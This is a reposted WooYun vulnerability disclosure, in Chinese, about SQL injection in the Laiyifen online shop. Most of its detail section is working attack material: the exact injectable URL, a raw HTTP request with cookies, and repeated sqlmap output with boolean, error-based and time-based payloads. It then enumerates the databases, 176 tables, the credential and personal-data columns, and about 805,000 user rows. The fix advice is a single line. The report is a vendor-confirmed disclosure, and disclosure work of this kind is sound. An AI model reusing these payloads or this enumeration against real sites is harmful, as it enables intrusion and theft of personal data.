来伊份官方商城某处SQL注入可致80W+用户数据泄露

2015年8月15日13:01:16评论320 views字数 219阅读0分43秒阅读模式

摘要

2014-11-19：细节已通知厂商并且等待厂商处理中
2014-11-19：厂商已经确认，细节仅向厂商公开
2014-11-29：细节向核心白帽子及相关领域专家公开
2014-12-09：细节向普通白帽子公开
2014-12-19：细节向实习白帽子公开
2015-01-03：细节向公众公开

漏洞概要关注数(3) 关注此漏洞

缺陷编号： WooYun-2014-83795

漏洞标题：来伊份官方商城某处SQL注入可致80W+用户数据泄露

漏洞作者： pandada

提交时间： 2014-11-19 11:25

公开时间： 2015-01-03 11:28

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 20

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

1人收藏

漏洞详情

披露状态：

简要描述：

来伊份作为中国休闲食品连锁零售业的领导品牌，目前在上海、江苏、浙江等9个省、直辖市拥有近2400家专卖店，每年为近6000万人次提供优质食品。从1999年第一家门店开业起，来伊份陆续推出过炒货、肉制品等9大系列700多种食品。2013年销售额超过30亿，全国员工人数近1万名。“三好一公道”是来伊份的经营理念，即品质好、味道好、服务好和价格公道。

详细说明：

注入点说明：（星号部分为注入点）

code 区域

GET /index.php/article-guanyuwomen-lists-1*.html HTTP/1.1
 Referer: http://www.laiyifen.com:80/
 Cookie: vary=d77f798a56ce90753573fc70c883ad591a94ee60638487365167a950e7783a9a; laiyifen_cookie=536871690.20480.0000; s=1e8737f4e245da0cab3df00d44c7437d; S[CART_COUNT]=0; S[CART_NUMBER]=0; S[CART_TOTAL_PRICE]=%EF%BF%A50.00; cart[go_back_link]=http%3A%2F%2Fwww.laiyifen.com%2F; ZDEDebuggerPresent=php,phtml,php3; MEMBER=-d41d8cd98f00b204e9800998ecf8427e-d41d8cd98f00b204e9800998ecf8427e-1415515310
 Host: www.laiyifen.com
 Connection: Keep-alive
 Accept-Encoding: gzip,deflate
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
 Accept: */*

漏洞证明：

code 区域

sqlmap identified the following injection points with a total of 235 HTTP(s) requests:
 ---
 Place: URI
 Parameter: #1*
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND 3372=3372 AND "GBOg"="GBOg.html
 
     Type: error-based
     Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
     Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND (SELECT 9648 FROM(SELECT COUNT(*),CONCAT(0x3a7374703a,(SELECT (CASE WHEN (9648=9648) THEN 1 ELSE 0 END)),0x3a656f733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "RgGC"="RgGC.html
 
     Type: AND/OR time-based blind
     Title: MySQL > 5.0.11 AND time-based blind
     Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND SLEEP(5) AND "iUWY"="iUWY.html
 ---
 
 current user:    '%.%'
 
 current database:    'laiyifendb'
 
 sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
 ---
 Place: URI
 Parameter: #1*
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND 3372=3372 AND "GBOg"="GBOg.html
 
     Type: error-based
     Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
     Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND (SELECT 9648 FROM(SELECT COUNT(*),CONCAT(0x3a7374703a,(SELECT (CASE WHEN (9648=9648) THEN 1 ELSE 0 END)),0x3a656f733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "RgGC"="RgGC.html
 
     Type: AND/OR time-based blind
     Title: MySQL > 5.0.11 AND time-based blind
     Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND SLEEP(5) AND "iUWY"="iUWY.html
 ---
 
 available databases [3]:
 [*] information_schema
 [*] laiyifendb
 [*] test
 
 sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
 ---
 Place: URI
 Parameter: #1*
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND 3372=3372 AND "GBOg"="GBOg.html
 
     Type: error-based
     Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
     Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND (SELECT 9648 FROM(SELECT COUNT(*),CONCAT(0x3a7374703a,(SELECT (CASE WHEN (9648=9648) THEN 1 ELSE 0 END)),0x3a656f733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "RgGC"="RgGC.html
 
     Type: AND/OR time-based blind
     Title: MySQL > 5.0.11 AND time-based blind
     Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND SLEEP(5) AND "iUWY"="iUWY.html
 ---
 
 Database: laiyifendb
 [176 tables]
 +-----------------------------------------+
 | app_default_info                        |
 | awardlist                               |
 | awardlist_copy                          |
 | collect_shop                            |
 | ds_0303_add                             |
 | ds_0303_payment                         |
 | ds_0303_ptype                           |
 | ds_0303_rpcpoll                         |
 | ds_ectools_analysis_logs                |
 | ds_ectools_analysis_logs_2              |
 | ds_guajian_1                            |
 | luck_log                                |
 | luck_log_mobile                         |
 | member_lucknum                          |
 | mobile_promotion_goods                  |
 | moblie_luck_num                         |
 | sdb_aftersales_return_product           |
 | sdb_authenticator_clients               |
 | sdb_authenticator_logs                  |
 | sdb_authenticator_requestlist           |
 | sdb_b2c_bcompany                        |
 | sdb_b2c_brand                           |
 | sdb_b2c_cart                            |
 | sdb_b2c_cart_objects                    |
 | sdb_b2c_comment_goods_point             |
 | sdb_b2c_comment_goods_type              |
 | sdb_b2c_counter                         |
 | sdb_b2c_counter_attach                  |
 | sdb_b2c_coupons                         |
 | sdb_b2c_delivery                        |
 | sdb_b2c_delivery_items                  |
 | sdb_b2c_dly_h_area                      |
 | sdb_b2c_dlycorp                         |
 | sdb_b2c_dlytype                         |
 | sdb_b2c_ecpool                          |
 | sdb_b2c_ecpool_mobile                   |
 | sdb_b2c_excard_rule                     |
 | sdb_b2c_excard_used                     |
 | sdb_b2c_fbtad                           |
 | sdb_b2c_goods                           |
 | sdb_b2c_goods_cat                       |
 | sdb_b2c_goods_keywords                  |
 | sdb_b2c_goods_lv_price                  |
 | sdb_b2c_goods_promotion_ref             |
 | sdb_b2c_goods_rate                      |
 | sdb_b2c_goods_spec_index                |
 | sdb_b2c_goods_type                      |
 | sdb_b2c_goods_type_props                |
 | sdb_b2c_goods_type_props_value          |
 | sdb_b2c_goods_type_spec                 |
 | sdb_b2c_goods_virtual_cat               |
 | sdb_b2c_history_orders                  |
 | sdb_b2c_history_products                |
 | sdb_b2c_huodong_log                     |
 | sdb_b2c_huodongda                       |
 | sdb_b2c_jiang                           |
 | sdb_b2c_jiang_huodong                   |
 | sdb_b2c_jiang_log                       |
 | sdb_b2c_jiang_members                   |
 | sdb_b2c_lulu_card                       |
 | sdb_b2c_member_addrs                    |
 | sdb_b2c_member_advance                  |
 | sdb_b2c_member_comments                 |
 | sdb_b2c_member_coupon                   |
 | sdb_b2c_member_goods                    |
 | sdb_b2c_member_lv                       |
 | sdb_b2c_member_msg                      |
 | sdb_b2c_member_point                    |
 | sdb_b2c_member_pwdlog                   |
 | sdb_b2c_member_systmpl                  |
 | sdb_b2c_members                         |
 | sdb_b2c_meng_buy_1                      |
 | sdb_b2c_meng_good_gift                  |
 | sdb_b2c_meng_luck_reg                   |
 | sdb_b2c_meng_send                       |
 | sdb_b2c_order_coupon_user               |
 | sdb_b2c_order_delivery                  |
 | sdb_b2c_order_items                     |
 | sdb_b2c_order_log                       |
 | sdb_b2c_order_objects                   |
 | sdb_b2c_order_pmt                       |
 | sdb_b2c_orders                          |
 | sdb_b2c_products                        |
 | sdb_b2c_recharge_log                    |
 | sdb_b2c_reship                          |
 | sdb_b2c_reship_items                    |
 | sdb_b2c_sales_baifendian                |
 | sdb_b2c_sales_bangdingsp                |
 | sdb_b2c_sales_freeShipping              |
 | sdb_b2c_sales_rule_goods                |
 | sdb_b2c_sales_rule_order                |
 | sdb_b2c_sell_logs                       |
 | sdb_b2c_shop                            |
 | sdb_b2c_single                          |
 | sdb_b2c_spec_values                     |
 | sdb_b2c_specification                   |
 | sdb_b2c_type_brand                      |
 | sdb_b2copenapi_api_fail                 |
 | sdb_b2copenapi_api_log                  |
 | sdb_b2copenapi_api_log_copy             |
 | sdb_b2copenapi_api_mobile_logs          |
 | sdb_b2copenapi_request_shops            |
 | sdb_base_app_content                    |
 | sdb_base_apps                           |
 | sdb_base_cache_expires                  |
 | sdb_base_files                          |
 | sdb_base_kvstore                        |
 | sdb_base_network                        |
 | sdb_base_queue                          |
 | sdb_base_rpcnotify                      |
 | sdb_base_rpcpoll                        |
 | sdb_base_task                           |
 | sdb_content_article_bodys               |
 | sdb_content_article_indexs              |
 | sdb_content_article_nodes               |
 | sdb_couponlog_order_coupon_ref          |
 | sdb_couponlog_order_coupon_user         |
 | sdb_dbeav_meta_register                 |
 | sdb_dbeav_meta_value_datetime           |
 | sdb_dbeav_meta_value_decimal            |
 | sdb_dbeav_meta_value_int                |
 | sdb_dbeav_meta_value_longtext           |
 | sdb_dbeav_meta_value_text               |
 | sdb_dbeav_meta_value_varchar            |
 | sdb_dbeav_recycle                       |
 | sdb_desktop_filter                      |
 | sdb_desktop_flow                        |
 | sdb_desktop_hasrole                     |
 | sdb_desktop_menus                       |
 | sdb_desktop_recycle                     |
 | sdb_desktop_role_flow                   |
 | sdb_desktop_roles                       |
 | sdb_desktop_tag                         |
 | sdb_desktop_tag_rel                     |
 | sdb_desktop_user_flow                   |
 | sdb_desktop_users                       |
 | sdb_ectools_analysis                    |
 | sdb_ectools_analysis_logs               |
 | sdb_ectools_currency                    |
 | sdb_ectools_order_bills                 |
 | sdb_ectools_payments                    |
 | sdb_ectools_refunds                     |
 | sdb_ectools_regions                     |
 | sdb_gift_cat                            |
 | sdb_gift_ref                            |
 | sdb_giftpackage_giftpackage             |
 | sdb_giftpackage_order_ref               |
 | sdb_image_image                         |
 | sdb_image_image_attach                  |
 | sdb_operatorlogmanage_logs              |
 | sdb_operatorlogmanage_register          |
 | sdb_pam_account                         |
 | sdb_pam_auth                            |
 | sdb_pam_log                             |
 | sdb_pointprofessional_member_point_task |
 | sdb_recommended_goods                   |
 | sdb_recommended_goods_period            |
 | sdb_search_search                       |
 | sdb_site_explorers                      |
 | sdb_site_link                           |
 | sdb_site_menus                          |
 | sdb_site_modules                        |
 | sdb_site_route_statics                  |
 | sdb_site_seo                            |
 | sdb_site_themes                         |
 | sdb_site_themes_tmpl                    |
 | sdb_site_widgets                        |
 | sdb_site_widgets_instance               |
 | sdb_site_widgets_proinstance            |
 | sdb_timedbuy_objitems                   |
 | shoplist                                |
 | swjiang_contect                         |
 | swjiang_contect_copy                    |
 | tbasarea                                |
 | tbaschildarea                           |
 | tbasthirdarea                           |
 +-----------------------------------------+

code 区域

Database: laiyifendb
 Table: sdb_pam_account
 [9 columns]
 +----------------+-----------------------+
 | Column         | Type                  |
 +----------------+-----------------------+
 | account_id     | mediumint(8) unsigned |
 | account_type   | varchar(30)           |
 | createtime     | int(10) unsigned      |
 | disabled       | enum('true','false')  |
 | hmlogin        | enum('false','true')  |
 | hmupdate       | enum('0','1')         |
 | login_name     | varchar(100)          |
 | login_password | varchar(32)           |
 | openlogin      | varchar(60)           |
 +----------------+-----------------------+
 
 sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
 ---
 Place: URI
 Parameter: #1*
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND 3372=3372 AND "GBOg"="GBOg.html
 
     Type: error-based
     Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
     Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND (SELECT 9648 FROM(SELECT COUNT(*),CONCAT(0x3a7374703a,(SELECT (CASE WHEN (9648=9648) THEN 1 ELSE 0 END)),0x3a656f733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "RgGC"="RgGC.html
 
     Type: AND/OR time-based blind
     Title: MySQL > 5.0.11 AND time-based blind
     Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND SLEEP(5) AND "iUWY"="iUWY.html
 ---
 
 Database: laiyifendb
 +-----------------+---------+
 | Table           | Entries |
 +-----------------+---------+
 | sdb_pam_account | 805856  |
 +-----------------+---------+
 
 sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
 ---
 Place: URI
 Parameter: #1*
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND 3372=3372 AND "GBOg"="GBOg.html
 
     Type: error-based
     Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
     Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND (SELECT 9648 FROM(SELECT COUNT(*),CONCAT(0x3a7374703a,(SELECT (CASE WHEN (9648=9648) THEN 1 ELSE 0 END)),0x3a656f733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "RgGC"="RgGC.html
 
     Type: AND/OR time-based blind
     Title: MySQL > 5.0.11 AND time-based blind
     Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND SLEEP(5) AND "iUWY"="iUWY.html
 ---
 
 Database: laiyifendb
 Table: sdb_b2c_members
 [70 columns]
 +----------------+-----------------------+
 | Column         | Type                  |
 +----------------+-----------------------+
 | addon          | longtext              |
 | addr           | varchar(255)          |
 | advance        | decimal(20,3)         |
 | advance_freeze | decimal(20,3)         |
 | anyolife_uname | varchar(100)          |
 | area           | varchar(255)          |
 | b_day          | tinyint(3) unsigned   |
 | b_month        | tinyint(3) unsigned   |
 | b_year         | smallint(5) unsigned  |
 | bind_time      | int(10) unsigned      |
 | biz_money      | decimal(20,3)         |
 | card_no        | varchar(20)           |
 | card_type      | varchar(45)           |
 | cert_no        | varchar(100)          |
 | cert_type      | varchar(200)          |
 | cur            | varchar(20)           |
 | custom         | longtext              |
 | disabled       | enum('true','false')  |
 | education      | varchar(45)           |
 | email          | varchar(200)          |
 | end_date       | int(10) unsigned      |
 | experience     | int(10)               |
 | family_mem     | varchar(45)           |
 | fav_tags       | longtext              |
 | firstname      | varchar(50)           |
 | foreign_id     | varchar(255)          |
 | interest       | longtext              |
 | is_card        | enum('0','1')         |
 | is_upload      | enum('0','1')         |
 | job            | varchar(200)          |
 | lang           | varchar(20)           |
 | last_loginip   | varchar(16)           |
 | last_logintime | int(10) unsigned      |
 | lastname       | varchar(50)           |
 | login_count    | int(11)               |
 | login_source   | varchar(45)           |
 | member_id      | mediumint(8) unsigned |
 | member_lv_id   | mediumint(8) unsigned |
 | member_refer   | varchar(50)           |
 | mobile         | varchar(30)           |
 | month_income   | varchar(45)           |
 | name           | varchar(50)           |
 | nation         | varchar(45)           |
 | order_num      | mediumint(8) unsigned |
 | pay_time       | mediumint(8) unsigned |
 | point          | int(10)               |
 | point_freeze   | mediumint(8) unsigned |
 | point_history  | mediumint(8) unsigned |
 | refer_id       | varchar(50)           |
 | refer_url      | varchar(200)          |
 | reg_ip         | varchar(16)           |
 | reg_source     | varchar(45)           |
 | regtime        | int(10) unsigned      |
 | remark         | text                  |
 | remark_type    | varchar(2)            |
 | score_rate     | decimal(5,3)          |
 | sex            | enum('0','1','2')     |
 | state          | tinyint(1)            |
 | sum_pointtotal | decimal(20,3)         |
 | tel            | varchar(30)           |
 | unreadmsg      | smallint(5) unsigned  |
 | use_total      | decimal(20,3)         |
 | vipapply_no    | varchar(45)           |
 | vipapply_time  | int(10) unsigned      |
 | vipcard_no     | varchar(45)           |
 | vipcard_pwd    | varchar(45)           |
 | vipinfo_no     | varchar(20)           |
 | vocation       | varchar(50)           |
 | wedlock        | enum('0','1')         |
 | zip            | varchar(20)           |
 +----------------+-----------------------+
 
 sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
 ---
 Place: URI
 Parameter: #1*
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND 3372=3372 AND "GBOg"="GBOg.html
 
     Type: error-based
     Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
     Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND (SELECT 9648 FROM(SELECT COUNT(*),CONCAT(0x3a7374703a,(SELECT (CASE WHEN (9648=9648) THEN 1 ELSE 0 END)),0x3a656f733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "RgGC"="RgGC.html
 
     Type: AND/OR time-based blind
     Title: MySQL > 5.0.11 AND time-based blind
     Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND SLEEP(5) AND "iUWY"="iUWY.html
 ---
 
 Database: laiyifendb
 +-----------------+---------+
 | Table           | Entries |
 +-----------------+---------+
 | sdb_b2c_members | 805876  |
 +-----------------+---------+

具体数据我就不dump了。

修复方案：

加强参数过滤。

版权声明：转载请注明来源 pandada@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2014-11-19 17:20

厂商回复：

非常感谢乌云和pandada的支持，非常感谢！

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2014-11-19 17:59 | pandada ( 实习白帽子 | Rank:91 漏洞数:20 | To be a warrior is not a simple matter o...)

2

咋就不能给高点分呢，我还是路人，友情多给点也好呀，亲

1# 回复此人
2014-11-20 09:26 | 紫衣大侠 ( 普通白帽子 | Rank:296 漏洞数:30 | 打杂的～～)

1

还有一处没修哦~~~

2# 回复此人

漏洞概要 关注数(3) 关注此漏洞

缺陷编号： WooYun-2014-83795

漏洞标题： 来伊份官方商城某处SQL注入可致80W+用户数据泄露

相关厂商： laiyifen.com

漏洞作者： pandada

提交时间： 2014-11-19 11:25

公开时间： 2015-01-03 11:28

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 20

漏洞状态： 厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 无

1人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 pandada@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(3) 关注此漏洞

漏洞标题：来伊份官方商城某处SQL注入可致80W+用户数据泄露

危害等级：高

漏洞状态：厂商已经确认

Tags标签：无

漏洞评价(共0人评价):

登陆后才能进行评分